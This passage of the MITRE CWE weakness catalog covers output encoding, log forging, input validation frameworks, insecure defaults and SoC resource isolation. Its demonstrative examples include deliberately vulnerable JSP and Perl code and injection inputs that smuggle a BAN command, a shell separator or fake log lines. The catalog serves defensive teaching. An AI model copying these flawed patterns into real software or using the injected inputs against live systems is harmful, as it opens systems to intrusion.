Integrity + Confidentiality + Availability + Access Control + Execute Unauthorized Code or Commands + The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted. + + + Confidentiality + Bypass Protection Mechanism + The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted. + + + + + Automated Static Analysis + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + Moderate + This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + Automated Dynamic Analysis + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error. + Alternately, use built-in functions, but consider using wrappers in case those functions are discovered to have a vulnerability. + + + + Architecture and Design + Parameterization + + If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. + For example, stored procedures can enforce database query structure and reduce the likelihood of SQL injection. + + + + Architecture and Design + Implementation + Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. + + + Architecture and Design + In some cases, input validation may be an important strategy when output encoding is not a complete solution. For example, you may be providing the same output that will be processed by multiple consumers that use different encodings or representations. In other cases, you may be required to allow user-supplied input to contain control information, such as limited HTML tags that support formatting in a wiki or bulletin board. When this type of requirement must be met, use an extremely strict allowlist to limit which control sequences can be used. Verify that the resulting syntactic structure is what you expect. Use your normal encoding methods for the remainder of the input. + + + Architecture and Design + Use input validation as a defense-in-depth measure to reduce the likelihood of output encoding errors (see CWE-20). + + + Requirements + Fully specify which encodings are required by components that will be communicating with each other. + + + Implementation + When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so. + + + + + This code displays an email address that was submitted as part of a form. + + <% String email = request.getParameter("email"); %>...Email Address: <%= email %> + + The value read from the form parameter is reflected back to the client browser without having been encoded prior to output, allowing various XSS attacks (CWE-79). + + + Consider a chat application in which a front-end web application communicates with a back-end server. The back-end is legacy code that does not perform authentication or authorization, so the front-end must implement it. The chat protocol supports two commands, SAY and BAN, although only administrators can use the BAN command. Each argument must be separated by a single space. The raw inputs are URL-encoded. The messaging protocol allows multiple commands to be specified on the same line if they are separated by a "|" character. + First let's look at the back end command processor code + + $inputString = readLineFromFileHandle($serverFH); + + # generate an array of strings separated by the "|" character. + @commands = split(/\|/, $inputString); + foreach $cmd (@commands) { + + # separate the operator from its arguments based on a single whitespace + ($operator, $args) = split(/ /, $cmd, 2); + $args = UrlDecode($args);if ($operator eq "BAN") {ExecuteBan($args);}elsif ($operator eq "SAY") {ExecuteSay($args);}} + + The front end web application receives a command, encodes it for sending to the server, performs the authorization check, and sends the command to the server. + + $inputString = GetUntrustedArgument("command");($cmd, $argstr) = split(/\s+/, $inputString, 2); + + # removes extra whitespace and also changes CRLF's to spaces + $argstr =~ s/\s+/ /gs; + $argstr = UrlEncode($argstr);if (($cmd eq "BAN") && (! IsAdministrator($username))) {die "Error: you are not the admin.\n";} + + # communicate with file server using a file handle + $fh = GetServerFileHandle("myserver"); + print $fh "$cmd $argstr\n"; + + It is clear that, while the protocol and back-end allow multiple commands to be sent in a single request, the front end only intends to send a single command. However, the UrlEncode function could leave the "|" character intact. If an attacker provides: + + SAY hello world|BAN user12 + + then the front end will see this is a "SAY" command, and the $argstr will look like "hello world | BAN user12". Since the command is "SAY", the check for the "BAN" command will fail, and the front end will send the URL-encoded command to the back end: + + SAY hello%20world|BAN%20user12 + + The back end, however, will treat these as two separate commands: + + SAY hello worldBAN user12 + + Notice, however, that if the front end properly encodes the "|" with "%7C", then the back end will only process a single command. + + + This example takes user input, passes it through an encoding scheme and then creates a directory specified by the user. + + sub GetUntrustedInput {return($ARGV[0]);} + sub encode {my($str) = @_;$str =~ s/\&/\&amp;/gs;$str =~ s/\"/\&quot;/gs;$str =~ s/\'/\&apos;/gs;$str =~ s/\</\&lt;/gs;$str =~ s/\>/\&gt;/gs;return($str);} + sub doit {my $uname = encode(GetUntrustedInput("username"));print "<b>Welcome, $uname!</b><p>\n";system("cd /home/$uname; /bin/ls -l"); + } + + The programmer attempts to encode dangerous characters, however the denylist for encoding is incomplete (CWE-184) and an attacker can still pass a semicolon, resulting in a chain with command injection (CWE-77). + Additionally, the encoding routine is used inappropriately with command execution. An attacker doesn't even need to insert their own semicolon. The attacker can instead leverage the encoding routine to provide the semicolon to separate the commands. If an attacker supplies a string of the form: + + ' pwd + + then the program will encode the apostrophe and insert the semicolon, which functions as a command separator when passed to the system function. This allows the attacker to complete the command injection. + + + + + CVE-2021-41232 + Chain: authentication routine in Go-based agile development product does not escape user name (CWE-116), allowing LDAP injection (CWE-90) + https://www.cve.org/CVERecord?id=CVE-2021-41232 + + + CVE-2008-4636 + OS command injection in backup software using shell metacharacters in a filename; correct behavior would require that this filename could not be changed. + https://www.cve.org/CVERecord?id=CVE-2008-4636 + + + CVE-2008-0769 + Web application does not set the charset when sending a page to a browser, allowing for XSS exploitation when a browser chooses an unexpected encoding. + https://www.cve.org/CVERecord?id=CVE-2008-0769 + + + CVE-2008-0005 + Program does not set the charset when sending a page to a browser, allowing for XSS exploitation when a browser chooses an unexpected encoding. + https://www.cve.org/CVERecord?id=CVE-2008-0005 + + + CVE-2008-5573 + SQL injection via password parameter; a strong password might contain "&" + https://www.cve.org/CVERecord?id=CVE-2008-5573 + + + CVE-2008-3773 + Cross-site scripting in chat application via a message subject, which normally might contain "&" and other XSS-related characters. + https://www.cve.org/CVERecord?id=CVE-2008-3773 + + + CVE-2008-0757 + Cross-site scripting in chat application via a message, which normally might be allowed to contain arbitrary content. + https://www.cve.org/CVERecord?id=CVE-2008-0757 + + + + + 22 + Improper Output Handling + + + IDS00-J + Sanitize untrusted data passed across a trust boundary + Exact + + + IDS05-J + Use a subset of ASCII for file and path names + + + IDS00-J + Prevent SQL injection + Imprecise + + + IDS33-PL + Sanitize untrusted data passed across a trust boundary + Exact + + + + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This weakness is primary to all weaknesses related to injection (CWE-74) since the inherent nature of injection involves the violation of structured messages. + + CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks. + However, input validation is not always sufficient, especially when less stringent data types must be supported, such as free-form text. Consider a SQL injection scenario in which a last name is inserted into a query. The name "O'Reilly" would likely pass the validation step since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the "'" apostrophe character, which would need to be escaped or otherwise neutralized. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded. + + The usage of the "encoding" and "escaping" terms varies widely. For example, in some programming languages, the terms are used interchangeably, while other languages provide APIs that use both terms for different tasks. This overlapping usage extends to the Web, such as the "escape" JavaScript function whose purpose is stated to be encoding. The concepts of encoding and escaping predate the Web by decades. Given such a context, it is difficult for CWE to adopt a consistent vocabulary that will not be misinterpreted by some constituency. + This is a data/directive boundary error in which data boundaries are not sufficiently enforced before it is sent to a different control sphere. + While many published vulnerabilities are related to insufficient output encoding, there is such an emphasis on input validation as a protection mechanism that the underlying causes are rarely described. Within CVE, the focus is primarily on well-understood issues like cross-site scripting and SQL injection. It is likely that this weakness frequently occurs in custom protocols that support multiple encodings, which are not necessarily detectable with automated techniques. + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Name, Relationships + + + CWE Content Team + MITRE + 2009-01-12 + updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Terminology_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated References + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Likelihood_of_Exploit, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships, Terminology_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Output Validation + Incorrect Output Sanitization + Insufficient Output Sanitization + + + + The product contains code that is not essential for execution, + i.e. makes no state changes and has no side effects that alter + data or control flow, such that removal of the code would have no impact + to functionality or correctness. + Irrelevant code could include dead code, + initialization that is not used, empty blocks, code that could be entirely + removed due to optimization, etc. + + + + + + + Indirect + + + + + Other + Reduce Reliability + + + Other + Reduce Performance + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2019-01-02 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not neutralize or incorrectly neutralizes output that is written to logs. + + This can allow an attacker to forge log entries or inject malicious content into logs. + Log forging vulnerabilities occur when: + + Data enters an application from an untrusted source. + The data is written to an application or system log file. + + + + + + + + + Primary + + + + + + + Applications typically use log files to store a history of events or transactions for later review, statistics gathering, or debugging. Depending on the nature of the application, the task of reviewing log files may be performed manually on an as-needed basis or automated with a tool that automatically culls logs for important events or trending information. + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Integrity + Confidentiality + Availability + Non-Repudiation + Modify Application Data + Hide Activities + Execute Unauthorized Code or Commands + Interpretation of the log files may be hindered or misdirected if an attacker can supply data to the application that is subsequently logged verbatim. In the most benign case, an attacker may be able to insert false entries into the log file by providing the application with input that includes appropriate characters. Forged or otherwise corrupted log files can be used to cover an attacker's tracks, possibly by skewing statistics, or even to implicate another party in the commission of a malicious act. If the log file is processed automatically, the attacker can render the file unusable by corrupting the format of the file or injecting unexpected characters. An attacker may inject code or other commands into the log file and take advantage of a vulnerability in the log processing utility. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + The following web application code attempts to read an integer value from a request object. If the parseInt call fails, then the input is logged with an error message indicating what happened. + + String val = request.getParameter("val");try { + + int value = Integer.parseInt(val); + }catch (NumberFormatException) {log.info("Failed to parse val = " + val);}... + + If a user submits the string "twenty-one" for val, the following entry is logged: + + + + INFO: Failed to parse val=twenty-one + + + + However, if an attacker submits the string "twenty-one%0a%0aINFO:+User+logged+out%3dbadguy", the following entry is logged: + + + + INFO: Failed to parse val=twenty-one + + + INFO: User logged out=badguy + + + + Clearly, attackers can use this same mechanism to insert arbitrary log entries. + + + + + CVE-2006-4624 + Chain: inject fake log entries with fake timestamps using CRLF injection + https://www.cve.org/CVERecord?id=CVE-2006-4624 + + + + + Log Forging + + + SFP23 + Exposed Data + + + IDS03-J + Do not log unsanitized user input + Exact + + + IDS03-J + Do not log unsanitized user input + Exact + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated References, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Background_Details, Common_Consequences, Description, Other_Notes, References + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples, Description, Name, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Other_Notes, Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Log Forging + Incorrect Output Sanitization for Logs + Improper Output Sanitization for Logs + + + + The product does not use, or incorrectly uses, an input validation framework that is provided by the source language or an independent library. + Many modern coding languages provide developers with input validation frameworks to make the task of input validation easier and less error-prone. These frameworks will automatically check all input against specified criteria and direct execution to error handlers when invalid input is received. The improper use (i.e., an incorrect implementation or missing altogether) of these frameworks is not directly exploitable, but can lead to an exploitable condition if proper input validation is not performed later in the product. Not using provided input validation frameworks can also hurt the maintainability of code as future developers may not recognize the downstream input validation being used in the place of the validation framework. + + + + + + Indirect + + + + + + + + Architecture and Design + This weakness may occur when software designers choose to not leverage input validation frameworks provided by the source language. + + + Implementation + This weakness may occur when developers do not correctly use a provided input validation framework. + + + + + Integrity + Unexpected State + Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others. + + + + + Automated Static Analysis + + Some instances of improper input validation can be detected using automated static analysis. + A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present. + Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. + + + + + + Implementation + Properly use provided input validation frameworks. + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-12-21 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The ASP.NET application does not use, or incorrectly uses, the model validation framework. + + + + + + Indirect + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Unexpected State + Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-12-21 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs CPU computations using + algorithms that are not as efficient as they could be for the + needs of the developer, i.e., the computations can be + optimized further. + This issue can make the product perform more slowly, possibly in ways that are noticeable to the users. If an attacker can influence the amount of computation that must be performed, e.g. by triggering worst-case complexity, then this performance problem might introduce a vulnerability. + + + + + + + Indirect + + + Primary + + + + + Architecture and Design + + + Implementation + + + + + Availability + DoS: Resource Consumption (CPU) + + + Other + Reduce Performance + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2019-01-03 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a function, library, or third party component + that has been explicitly prohibited, whether by the developer or + the customer. + The developer - or customers - may wish to restrict or eliminate use of a function, library, or third party component for any number of reasons, including real or suspected vulnerabilities; difficulty to use securely; export controls or license requirements; obsolete or poorly-maintained code; internal code being scheduled for deprecation; etc. + To reduce risk of vulnerabilities, the developer might maintain a list of "banned" functions that programmers must avoid using because the functions are difficult or impossible to use securely. This issue can also make the product more costly and difficult to maintain. + + + + + + + Indirect + + + Primary + + + + + Implementation + + + + + Other + Reduce Maintainability + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2019-01-03 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not restrict or incorrectly restricts operations within the boundaries of a resource that is accessed using an index or pointer, such as memory or files. + + + + + + + + + + Implementation + + + + + Other + Varies by Context + + + + + SFP8 + Faulty Buffer Access + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Name, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Range Errors + Improper Access of Indexable Resource (aka 'Range Error') + Improper Access of Indexable Resource ('Range Error') + + + + This entry has been deprecated because it was a duplicate of CWE-908. All content has been transferred to CWE-908. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CWE Content Team + MITRE + 2019-03-25 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Use of Uninitialized Resource + + + + The product initializes or sets a resource with a default that is intended to be changed by the administrator, but the default is not secure. + Developers often choose default values that leave the product as open and easy to use as possible out-of-the-box, under the assumption that the administrator can (or should) change the default value. However, this ease-of-use comes at a cost when the default is insecure and the administrator does not change it. + + + + + + + + Primary + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry improves organization of concepts under initialization. The typical CWE model is to cover "Missing" and "Incorrect" behaviors. Arguably, this entry could be named as "Incorrect" instead of "Insecure." This might be changed in the near future. + + + + CWE Content Team + MITRE + 2019-03-25 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The System-On-a-Chip (SoC) does not properly isolate shared resources between trusted and untrusted agents. + + A System-On-a-Chip (SoC) has a lot of functionality, but it may have a limited number of pins or pads. A pin can only perform one function at a time. However, it can be configured to perform multiple different functions. This technique is called pin multiplexing. Similarly, several resources on the chip may be shared to multiplex and support different features or functions. When such resources are shared between trusted and untrusted agents, untrusted agents may be able to access the assets intended to be accessed only by the trusted agents. + + + + + + + + + Primary + + + + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + If resources being used by a trusted user are shared with an untrusted user, the untrusted user may be able to modify the functionality of the shared resource of the trusted user. + + + Integrity + Quality Degradation + The functionality of the shared resource may be intentionally degraded. + + + + + Automated Dynamic Analysis + + Pre-silicon / post-silicon: Test access to shared systems resources (memory ranges, control registers, etc.) from untrusted software to verify that the assets are not incorrectly exposed to untrusted agents. Note that access to shared resources can be dynamically allowed or revoked based on system flows. Security testing should cover such dynamic shared resource allocation and access control modification flows. + + High + + + + + Architecture and Design + Separation of Privilege + + When sharing resources, avoid mixing agents of varying trust levels. + Untrusted agents should not share resources with trusted agents. + + + + + + Consider the following SoC + design. The Hardware Root of Trust (HRoT) local SRAM is memory mapped in the core{0-N} + address space. The HRoT allows or disallows access to private memory ranges, thus + allowing the sram to function as a mailbox for communication between untrusted and + trusted HRoT partitions. + + + + We assume that the threat is from malicious software in + the untrusted domain. We assume this software has access + to the core{0-N} memory map and can be running at any + privilege level on the untrusted cores. The capability + of this threat in this example is communication to and + from the mailbox region of SRAM modulated by the + hrot_iface. To address this threat, information must not + enter or exit the shared region of SRAM through + hrot_iface when in secure or privileged mode. + + + + + + + CVE-2020-8698 + Processor has improper isolation of shared resources allowing for information disclosure. + https://www.cve.org/CVERecord?id=CVE-2020-8698 + + + CVE-2019-6260 + Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC's physical address space from the host, and possibly the network [REF-1138]. + https://www.cve.org/CVERecord?id=CVE-2019-6260 + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-10-15 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Common_Consequences, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Description, Observed_Examples, References, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-10-13 + updated Detection_Factors + + + CWE Content Team + MITRE + 2023-04-27 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + Tortuga Logic + 2021-07-16 + Provided Demonstrative Example for Hardware Root of Trust + + + Hareesh Khattri + Intel Corporation + 2021-10-22 + provided observed example + + + Hareesh Khattri + Intel Corporation + 2022-04-18 + changed detection method + + Improper Isolation of Shared Resources on System-on-Chip (SoC) + + + + The product performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. + + Certain languages allow direct addressing of memory locations and do not automatically ensure that these locations are valid for the memory buffer that is being referenced. This can cause read or write operations to be performed on memory locations that may be associated with other variables, data structures, or internal program data. + As a result, an attacker may be able to execute arbitrary code, alter the intended control flow, read sensitive information, or cause the system to crash. + + + + + + + + + + + + + Buffer Overflow + This term has many different meanings to different audiences. From a CWE mapping perspective, this term should be avoided where possible. 